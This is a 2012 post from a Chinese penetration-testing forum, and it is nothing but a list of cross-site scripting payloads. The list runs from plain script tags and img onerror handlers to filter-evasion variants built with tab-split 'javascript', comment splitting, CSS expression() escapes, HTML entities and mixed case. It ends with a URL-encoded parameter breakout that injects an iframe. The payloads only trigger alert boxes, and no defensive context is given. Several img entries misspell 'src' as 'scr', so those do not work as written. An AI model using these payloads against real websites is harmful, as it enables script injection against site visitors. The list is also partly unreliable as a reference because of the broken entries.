中国网络渗透测试联盟
Title: xss
Author: admin
Time: 2012-9-15 14:09
<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (each ? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)